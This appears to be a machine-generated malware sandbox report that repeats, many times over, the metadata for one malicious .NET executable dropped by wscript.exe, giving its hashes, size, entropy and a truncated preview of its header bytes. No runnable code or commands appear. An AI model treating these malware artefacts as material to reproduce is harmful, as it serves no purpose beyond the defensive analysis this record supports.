                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
